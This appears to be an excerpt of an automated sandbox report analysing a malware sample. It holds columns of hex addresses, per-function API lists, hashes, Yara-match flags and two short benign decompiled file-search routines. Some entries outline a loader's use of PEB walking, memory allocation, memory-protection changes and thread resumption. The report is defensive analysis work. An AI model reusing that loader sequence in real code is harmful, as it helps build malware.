                                                                                      0x7103216f
                                                                                      0x7103216f
                                                                                      0x71032170
                                                                                      0x71032173
                                                                                      0x71032176
                                                                                      0x71032177
                                                                                      0x71032151
                                                                                      0x71032152
                                                                                      0x71032153
                                                                                      0x71032156
                                                                                      0x71032159
                                                                                      0x7103215c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103215c
                                                                                      0x00000000
                                                                                      0x71031fa7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031fb3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031f9a
                                                                                      0x71031f9e
                                                                                      0x71031fa2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103211c
                                                                                      0x71032120
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032126
                                                                                      0x7103212f
                                                                                      0x71032136
                                                                                      0x7103213e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032083
                                                                                      0x71032083
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031fbc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710321a6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103208b
                                                                                      0x7103208d
                                                                                      0x7103208d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032196
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103219a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710321a2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320d3
                                                                                      0x710320d5
                                                                                      0x710320d5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103209d
                                                                                      0x7103209f
                                                                                      0x7103209f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320af
                                                                                      0x710320b1
                                                                                      0x710320b1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320e1
                                                                                      0x710320e3
                                                                                      0x710320e3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320ba
                                                                                      0x710320bc
                                                                                      0x710320bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320c1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103219e
                                                                                      0x710321a8
                                                                                      0x710321a8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320ec
                                                                                      0x710320f0
                                                                                      0x710320f5
                                                                                      0x710320f8
                                                                                      0x710320f9
                                                                                      0x710320fc
                                                                                      0x71032102
                                                                                      0x71032102
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103218e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320c5
                                                                                      0x710320c7
                                                                                      0x710320c7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031fc3
                                                                                      0x71031fc3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320da
                                                                                      0x710320dc
                                                                                      0x710320dc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031f67
                                                                                      0x71031f6d
                                                                                      0x71031f70
                                                                                      0x71031f72
                                                                                      0x71031f72
                                                                                      0x71031f75
                                                                                      0x71031f79
                                                                                      0x71031f86
                                                                                      0x71031f88
                                                                                      0x71031f8e
                                                                                      0x71031f8e
                                                                                      0x71031f8e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103208e
                                                                                      0x7103208e
                                                                                      0x71032090
                                                                                      0x71032097
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320d6
                                                                                      0x710320d6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320a0
                                                                                      0x710320a0
                                                                                      0x710320a2
                                                                                      0x710320a9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320b2
                                                                                      0x710320b2
                                                                                      0x710320b4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320e4
                                                                                      0x710320e4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320bd
                                                                                      0x710320bd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103210a
                                                                                      0x7103210e
                                                                                      0x71032113
                                                                                      0x71032116
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320c8
                                                                                      0x710320c8
                                                                                      0x710320cb
                                                                                      0x710320cd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710320dd
                                                                                      0x710320dd
                                                                                      0x710320e6
                                                                                      0x710320e6
                                                                                      0x71031fc5
                                                                                      0x71031fc5
                                                                                      0x71031fc8
                                                                                      0x71031fcf
                                                                                      0x71031fd1
                                                                                      0x71031fd3
                                                                                      0x71031fda
                                                                                      0x71031fdd
                                                                                      0x71031fe2
                                                                                      0x71031fe4
                                                                                      0x71031fe6
                                                                                      0x71031fea
                                                                                      0x71031ff0
                                                                                      0x71031ff6
                                                                                      0x71031ff6
                                                                                      0x71031ff8
                                                                                      0x71031ff8
                                                                                      0x71031ff9
                                                                                      0x71031ff9
                                                                                      0x71031ffd
                                                                                      0x71032003
                                                                                      0x71032005
                                                                                      0x71032009
                                                                                      0x7103200e
                                                                                      0x7103200e
                                                                                      0x71032010
                                                                                      0x71032010
                                                                                      0x71032013
                                                                                      0x71032016
                                                                                      0x7103201f
                                                                                      0x71032025
                                                                                      0x71032028
                                                                                      0x71032028
                                                                                      0x7103202a
                                                                                      0x7103202d
                                                                                      0x71032033
                                                                                      0x71032039
                                                                                      0x71032039
                                                                                      0x7103203b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032041
                                                                                      0x71032041
                                                                                      0x71032045
                                                                                      0x7103204c
                                                                                      0x71032070
                                                                                      0x71032070
                                                                                      0x71032074
                                                                                      0x71032076
                                                                                      0x71032079
                                                                                      0x71032079
                                                                                      0x7103207c
                                                                                      0x7103207c
                                                                                      0x00000000
                                                                                      0x71032074
                                                                                      0x71032051
                                                                                      0x71032054
                                                                                      0x71032054
                                                                                      0x7103205b
                                                                                      0x7103205d
                                                                                      0x71032060
                                                                                      0x71032067
                                                                                      0x71032068
                                                                                      0x7103206e
                                                                                      0x7103206e
                                                                                      0x00000000
                                                                                      0x7103206e
                                                                                      0x71032062
                                                                                      0x71032065
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032065
                                                                                      0x71031ff2
                                                                                      0x71031ff4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031f60
                                                                                      0x71031e05
                                                                                      0x71031e05
                                                                                      0x71031e06
                                                                                      0x71031f46
                                                                                      0x00000000
                                                                                      0x71031f46
                                                                                      0x71031e0c
                                                                                      0x71031e0d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031e13
                                                                                      0x71031e16
                                                                                      0x71031f0b
                                                                                      0x71031f0b
                                                                                      0x71031f0e
                                                                                      0x71031f23
                                                                                      0x71031f25
                                                                                      0x71031f25
                                                                                      0x71031f26
                                                                                      0x71031f29
                                                                                      0x71031f2c
                                                                                      0x71031f38
                                                                                      0x71031f38
                                                                                      0x71031f38
                                                                                      0x71031f2e
                                                                                      0x71031f2e
                                                                                      0x71031f2e
                                                                                      0x71031f3e
                                                                                      0x00000000
                                                                                      0x71031f3e
                                                                                      0x71031f10
                                                                                      0x71031f10
                                                                                      0x71031f11
                                                                                      0x71031f1f
                                                                                      0x00000000
                                                                                      0x71031f1f
                                                                                      0x71031f14
                                                                                      0x71031f15
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031f1b
                                                                                      0x00000000
                                                                                      0x71031f1b
                                                                                      0x71031e1c
                                                                                      0x71031f07
                                                                                      0x00000000
                                                                                      0x71031f07
                                                                                      0x71031e22
                                                                                      0x71031e22
                                                                                      0x71031e25
                                                                                      0x71031e4e
                                                                                      0x00000000
                                                                                      0x71031e4e
                                                                                      0x71031e27
                                                                                      0x71031e27
                                                                                      0x71031e2a
                                                                                      0x71031e44
                                                                                      0x00000000
                                                                                      0x71031e44
                                                                                      0x71031e2c
                                                                                      0x71031e2c
                                                                                      0x71031e2f
                                                                                      0x71031e3e
                                                                                      0x00000000
                                                                                      0x71031e3e
                                                                                      0x71031e32
                                                                                      0x71031e33
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031e35
                                                                                      0x00000000
                                                                                      0x71031cec
                                                                                      0x71031cec
                                                                                      0x71031cef
                                                                                      0x00000000
                                                                                      0x71031cef
                                                                                      0x71031ce6
                                                                                      0x71031cd3
                                                                                      0x71031cd8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031cda
                                                                                      0x71031cdd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031cdd
                                                                                      0x71031c6d
                                                                                      0x71031c70
                                                                                      0x71031ca6
                                                                                      0x71031ca9
                                                                                      0x00000000
                                                                                      0x71031caf
                                                                                      0x71031cb1
                                                                                      0x71031cb5
                                                                                      0x71031cbc
                                                                                      0x71031cc3
                                                                                      0x71031cc6
                                                                                      0x71031cc9
                                                                                      0x00000000
                                                                                      0x71031cc9
                                                                                      0x71031ca9
                                                                                      0x71031c72
                                                                                      0x71031c73
                                                                                      0x71031c8e
                                                                                      0x71031c91
                                                                                      0x00000000
                                                                                      0x71031c97
                                                                                      0x71031c97
                                                                                      0x71031c9e
                                                                                      0x71031ca1
                                                                                      0x00000000
                                                                                      0x71031ca1
                                                                                      0x71031c91
                                                                                      0x71031c78
                                                                                      0x00000000
                                                                                      0x71031c7e
                                                                                      0x71031c7e
                                                                                      0x71031c85
                                                                                      0x00000000
                                                                                      0x71031c85
                                                                                      0x71031c78
                                                                                      0x71031e74
                                                                                      0x71031e79
                                                                                      0x71031e7e
                                                                                      0x71031e82
                                                                                      0x71032355
                                                                                      0x7103235b
                                                                                      0x71031e94
                                                                                      0x71031e96
                                                                                      0x71031e97
                                                                                      0x7103227e
                                                                                      0x7103227e
                                                                                      0x71032281
                                                                                      0x71032284
                                                                                      0x710322a1
                                                                                      0x710322a7
                                                                                      0x710322a9
                                                                                      0x710322af
                                                                                      0x710322c6
                                                                                      0x710322c6
                                                                                      0x710322c6
                                                                                      0x710322d3
                                                                                      0x710322d9
                                                                                      0x710322dc
                                                                                      0x710322e2
                                                                                      0x710322e4
                                                                                      0x710322e8
                                                                                      0x710322ea
                                                                                      0x710322f1
                                                                                      0x710322f6
                                                                                      0x710322f9
                                                                                      0x710322fb
                                                                                      0x71032300
                                                                                      0x71032312
                                                                                      0x71032312
                                                                                      0x71032300
                                                                                      0x710322f9
                                                                                      0x710322e8
                                                                                      0x71032318
                                                                                      0x7103231b
                                                                                      0x71032325
                                                                                      0x7103232d
                                                                                      0x7103233a
                                                                                      0x71032340
                                                                                      0x71032343
                                                                                      0x71032273
                                                                                      0x71032273
                                                                                      0x00000000
                                                                                      0x71032273
                                                                                      0x71032349
                                                                                      0x7103234f
                                                                                      0x7103234f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032351
                                                                                      0x71032351
                                                                                      0x71032351
                                                                                      0x71032351
                                                                                      0x00000000
                                                                                      0x7103231d
                                                                                      0x7103231d
                                                                                      0x71032323
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032323
                                                                                      0x7103231b
                                                                                      0x710322b2
                                                                                      0x710322b8
                                                                                      0x710322ba
                                                                                      0x710322c0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710322c0
                                                                                      0x71032286
                                                                                      0x7103228d
                                                                                      0x71032293
                                                                                      0x71032299
                                                                                      0x00000000
                                                                                      0x71032299
                                                                                      0x71031e9d
                                                                                      0x71031e9e
                                                                                      0x7103225d
                                                                                      0x7103225d
                                                                                      0x71032263
                                                                                      0x71032266
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103226d
                                                                                      0x71032272
                                                                                      0x00000000
                                                                                      0x71032272
                                                                                      0x71031ea5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031eab
                                                                                      0x71031eab
                                                                                      0x71031eb4
                                                                                      0x71031eb9
                                                                                      0x71031ebf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031ec5
                                                                                      0x71031ed2
                                                                                      0x71031ed8
                                                                                      0x71031ee2
                                                                                      0x71031ee8
                                                                                      0x71031ef0
                                                                                      0x71031f00
                                                                                      0x00000000
                                                                                      0x71031f00

                                                                                      APIs
                                                                                        • Part of subcall function 710312BB: GlobalAlloc.KERNEL32(00000040,?,710312DB,?,7103137F,00000019,710311CA,-000000A0), ref: 710312C5
                                                                                      • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 71031D2D
                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 71031D75
                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 71031D7F
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 71031D92
                                                                                      • GlobalFree.KERNEL32(?), ref: 71031E74
                                                                                      • GlobalFree.KERNEL32(?), ref: 71031E79
                                                                                      • GlobalFree.KERNEL32(?), ref: 71031E7E
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 71032068
                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 71032222
                                                                                      • GetModuleHandleW.KERNEL32(00000008), ref: 710322A1
                                                                                      • LoadLibraryW.KERNEL32(00000008), ref: 710322B2
                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 7103230C
                                                                                      • lstrlenW.KERNEL32(00000808), ref: 71032326
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26231597486.0000000071030000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231722184.0000000071034000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231774806.0000000071036000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 245916457-0
                                                                                      • Opcode ID: 599d9ed020341530ed5b3d32b1188a6982aff43287a990e006b6d58deeed7a48
                                                                                      • Instruction ID: 065f7a94ea7cef69f02624621f24b92bb9ff7e5ab1fbd14c50e57bdda955b902
                                                                                      • Opcode Fuzzy Hash: 599d9ed020341530ed5b3d32b1188a6982aff43287a990e006b6d58deeed7a48
                                                                                      • Instruction Fuzzy Hash: 2C22EE75D0420ADEDB12DFB4C9842EDBBF2FF89B05F90856EE1A6E2280D7709585CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F493D1 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 326COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 884 2f493d1-2f4943e GetPEB 886 2f49440-2f49469 884->886 887 2f499ef 886->887 888 2f4946f-2f494ef 886->888 890 2f494f5-2f494fc 888->890 890->890 891 2f494fe-2f49501 890->891 892 2f49506-2f49533 891->892 892->886 893 2f49539-2f495ae 892->893 893->892 895 2f495b4-2f495ed 893->895 896 2f495f0-2f495fc 895->896 896->896 897 2f495fe-2f49668 896->897 899 2f4966b-2f49677 897->899 899->899 900 2f49679-2f496b7 899->900 900->892 901 2f496bd-2f49757 call 2f57f48 900->901 905 2f4975d-2f497c1 901->905 906 2f547be-2f54863 901->906 911 2f497c4-2f497cb 905->911 909 2f54865-2f54885 call 2f54ee4 call 2f548ee 906->909 910 2f54888-2f54896 LoadLibraryA call 2f548ee 906->910 909->910 911->911 914 2f497cd-2f497ef 911->914 917 2f497f5-2f499e4 914->917 918 2f57f48-2f57f4f 914->918 917->892 920 2f57f50-2f57fba 918->920 925 2f57fbc-2f57fbe 920->925
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: -Q*$>$[o
                                                                                      • API String ID: 0-1076388450
                                                                                      • Opcode ID: fc1512524ab8aeb9e7159342468f1a1cb6e644bd5d3f5a597a9b085d21ef7915
                                                                                      • Instruction ID: a5ec4b5e604626094d095e97276e62d68a31ae94e6964df0d1119fbacebecc76
                                                                                      • Opcode Fuzzy Hash: fc1512524ab8aeb9e7159342468f1a1cb6e644bd5d3f5a597a9b085d21ef7915
                                                                                      • Instruction Fuzzy Hash: FAC127717043998FDF34CE29CDA43DB37A6EF96390F54822ACD4A9B249D7B08942CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406873 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00406873(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4302b8;
			}




                                                                                      0x0040687e
                                                                                      0x00406887
                                                                                      0x00000000
                                                                                      0x00406894
                                                                                      0x0040688a
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(75A43420,004302B8,C:\,00405F5D,C:\,C:\,00000000,C:\,C:\,75A43420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75A43420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                      • FindClose.KERNEL32(00000000), ref: 0040688A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID: C:\
                                                                                      • API String ID: 2295610775-3404278061
                                                                                      • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                      • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                                      • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                      • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F55355 Relevance: 3.3, APIs: 2, Instructions: 264librarymemorynativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(?,?,?,02F45CD3,-213C6C70,02F52D38,00000000), ref: 02F54889
                                                                                      • NtAllocateVirtualMemory.NTDLL(-7E909493), ref: 02F555E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2616484454-0
                                                                                      • Opcode ID: 3afbd234381342218b2d90654377acb20a8aa1535e196fb6fcde116abc13e513
                                                                                      • Instruction ID: f50371b8f4d01613c465a1961ec8150fc7fc5033a2d20de026f98ebe6befe4c3
                                                                                      • Opcode Fuzzy Hash: 3afbd234381342218b2d90654377acb20a8aa1535e196fb6fcde116abc13e513
                                                                                      • Instruction Fuzzy Hash: 2F914632A09359CFDB309E649C607EA77A2FF567E4F95451ADE499B200C7318A81CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F4853E Relevance: 1.9, APIs: 1, Instructions: 398COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 89228f478683897c53fb3703876bb5f0a4a123265d083c9466bf266b819d443e
                                                                                      • Instruction ID: 1f5e30903c23c434af44835389052536e4cab6d698477326f60489e6e9008939
                                                                                      • Opcode Fuzzy Hash: 89228f478683897c53fb3703876bb5f0a4a123265d083c9466bf266b819d443e
                                                                                      • Instruction Fuzzy Hash: 60B1F037605A419FE3018AB8A4556A2BB62EE416F0BB40FA7DB53CF581C72750B3CBC5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F5770E Relevance: 1.6, APIs: 1, Instructions: 50nativethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtResumeThread.NTDLL(-280B34B8,A6C9A092,-1063CDC7,0000F7DB,52765AC1,B4AE4544), ref: 02F5799A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      • Opcode ID: a9ccd2b095f85c7cd342ab9b368f435c3368ffea4efb7efbfcc1aee76b001dcc
                                                                                      • Instruction ID: ebc68d64ca6e15b9ae622792722125894b855b9b553773f566d306c1bc53ceea
                                                                                      • Opcode Fuzzy Hash: a9ccd2b095f85c7cd342ab9b368f435c3368ffea4efb7efbfcc1aee76b001dcc
                                                                                      • Instruction Fuzzy Hash: 9301B536705759CECB28AD348E947E9B752AF893D4F65422ACF068B248D3348645CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02F57165 Relevance: 1.5, APIs: 1, Instructions: 44nativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtProtectVirtualMemory.NTDLL(-00000001266A15CF,?,?,?,?,02F564A8,-3BF98FE2,02F467A4), ref: 02F57249
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MemoryProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2706961497-0
                                                                                      • Opcode ID: 682ce71800485db04d7fc49ca770b7a9459893514f957d6aea8b44c7349824da
                                                                                      • Instruction ID: 3f999520c6e12a9e397bcbd06d00cf21a607a79381284804f882796b909ecd67
                                                                                      • Opcode Fuzzy Hash: 682ce71800485db04d7fc49ca770b7a9459893514f957d6aea8b44c7349824da
                                                                                      • Instruction Fuzzy Hash: DE011AB6B042859FEB34CE68CD58BDA76E6AFC8750F05812AEC1DDB308D631DA118B50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 41%
                                                                                      			E0040290B(short __ebx, short* __edi) {
				void* _t8;
				void* _t21;

				_t8 = FindFirstFileW(E00402DA6(2), _t21 - 0x2dc); // executed
				if(_t8 != 0xffffffff) {
					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040653D();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}





                                                                                      0x0040291a
                                                                                      0x00402923
                                                                                      0x0040293e
                                                                                      0x00402949
                                                                                      0x0040294a
                                                                                      0x00402a94
                                                                                      0x00402925
                                                                                      0x00402928
                                                                                      0x0040292b
                                                                                      0x0040292e
                                                                                      0x0040292e
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: 2616af6840be9ad065c7271e10669628003eadbae38ac98b1b8d582da80c65e5
                                                                                      • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                                                      • Opcode Fuzzy Hash: 2616af6840be9ad065c7271e10669628003eadbae38ac98b1b8d582da80c65e5
                                                                                      • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
